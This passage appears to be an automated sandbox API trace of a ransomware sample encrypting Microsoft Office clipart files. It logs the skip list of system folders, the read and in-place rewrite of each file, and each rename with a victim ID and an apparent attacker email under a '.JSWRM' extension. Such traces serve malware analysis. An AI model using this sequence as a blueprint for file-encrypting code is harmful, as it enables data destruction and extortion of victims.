lstrcmpiW (lpString1="J0107492.WMF", lpString2="windows") returned -1 [0082.551] lstrcmpiW (lpString1="J0107492.WMF", lpString2="recovery") returned -1 [0082.551] lstrcmpiW (lpString1="J0107492.WMF", lpString2="perflogs") returned -1 [0082.551] lstrcmpiW (lpString1="J0107492.WMF", lpString2="documents and settings") returned 1 [0082.551] lstrcmpiW (lpString1="J0107492.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.551] lstrcmpiW (lpString1="J0107492.WMF", lpString2="system volume information") returned -1 [0082.551] lstrcmpiW (lpString1="J0107492.WMF", lpString2="msocache") returned -1 [0082.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0082.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107492.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107492.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107492.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0082.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0082.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107492.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107492.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107492.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0082.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0082.551] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.551] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.551] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0082.551] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.553] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6860) returned 1 [0082.553] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1ac0) returned 0x205850 [0082.553] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1ac0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1ac0, lpOverlapped=0x0) returned 1 [0082.555] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.555] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1ac0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1ac0, lpOverlapped=0x0) returned 1 [0082.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.555] CloseHandle (hObject=0x314) returned 1 [0082.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0082.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0082.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0d8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0082.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0082.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3a8 [0082.556] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3a8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3a8 | out: hHeap=0x1e0000) returned 1 [0082.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0082.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247990 [0082.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0082.556] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0082.556] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107492.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107492.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247990 | out: hHeap=0x1e0000) returned 1 [0082.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0082.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0082.557] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1918, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107494.WMF", cAlternateFileName="")) returned 1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2=".") returned 1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="..") returned 1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="...") returned 1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="windows") returned -1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="recovery") returned -1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="perflogs") returned -1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="documents and settings") returned 1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="system volume information") returned -1 [0082.557] lstrcmpiW (lpString1="J0107494.WMF", lpString2="msocache") returned -1 [0082.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0082.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107494.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107494.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107494.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0082.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0082.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107494.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107494.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107494.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0082.557] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0082.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0082.557] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.558] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0082.558] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.558] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=6424) returned 1 [0082.558] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1910) returned 0x205850 [0082.558] ReadFile (in: hFile=0x314, lpBuffer=0x205850, nNumberOfBytesToRead=0x1910, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345e89c*=0x1910, lpOverlapped=0x0) returned 1 [0082.560] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.560] WriteFile (in: hFile=0x314, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1910, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345e898*=0x1910, lpOverlapped=0x0) returned 1 [0082.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0082.560] CloseHandle (hObject=0x314) returned 1 [0082.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0082.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0082.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a420 [0082.560] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a420, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a420 | out: hHeap=0x1e0000) returned 1 [0082.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0082.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0082.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0082.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0082.560] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107494.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107494.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0082.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0082.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0082.561] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe736331, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x22a0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107496.WMF", cAlternateFileName="")) returned 1 [0082.561] lstrcmpiW (lpString1="J0107496.WMF", lpString2=".") returned 1 [0082.561] lstrcmpiW (lpString1="J0107496.WMF", lpString2="..") returned 1 [0082.561] lstrcmpiW (lpString1="J0107496.WMF", lpString2="...") returned 1 [0082.561] lstrcmpiW (lpString1="J0107496.WMF", lpString2="windows") returned -1 [0082.561] lstrcmpiW (lpString1="J0107496.WMF", lpString2="recovery") returned -1 [0082.562] lstrcmpiW (lpString1="J0107496.WMF", lpString2="perflogs") returned -1 [0082.562] lstrcmpiW (lpString1="J0107496.WMF", lpString2="documents and settings") returned 1 [0082.562] lstrcmpiW (lpString1="J0107496.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.562] lstrcmpiW (lpString1="J0107496.WMF", lpString2="system volume information") returned -1 [0082.562] lstrcmpiW (lpString1="J0107496.WMF", lpString2="msocache") returned -1 [0082.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0082.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107496.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107496.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107496.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0082.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0082.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107496.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107496.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107496.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0082.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0082.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0082.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0082.562] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0082.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0082.562] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0082.562] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8864) returned 1 [0082.562] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x22a0) returned 0x24d210 [0082.562] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x22a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x22a0, lpOverlapped=0x0) returned 1 [0082.564] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0082.564] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x22a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x22a0, lpOverlapped=0x0) returned 1 [0082.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0082.565] CloseHandle (hObject=0x314) returned 1 [0082.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0082.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0082.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0082.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0082.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0082.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0082.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0082.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0082.565] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0082.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0082.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0082.565] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247b80 [0082.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0082.565] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0082.565] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0107496.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0107496.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0082.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247b80 | out: hHeap=0x1e0000) returned 1 [0082.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0082.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0082.566] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe7100f8, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe7100f8, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe7100f8, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1068, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0107500.WMF", cAlternateFileName="")) returned 1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2=".") returned 1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="..") returned 1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="...") returned 1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="windows") returned -1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="recovery") returned -1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="perflogs") returned -1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="documents and settings") returned 1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="$RECYCLE.BIN") returned 1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="system volume information") returned -1 [0082.566] lstrcmpiW (lpString1="J0107500.WMF", lpString2="msocache") returned -1 [0082.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0082.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107500.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107500.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107500.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0082.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107500.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0082.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0107500.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0107500.WMF", lpUsedDefaultChar=0x0) returned 12 [0082.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0082.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0082.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 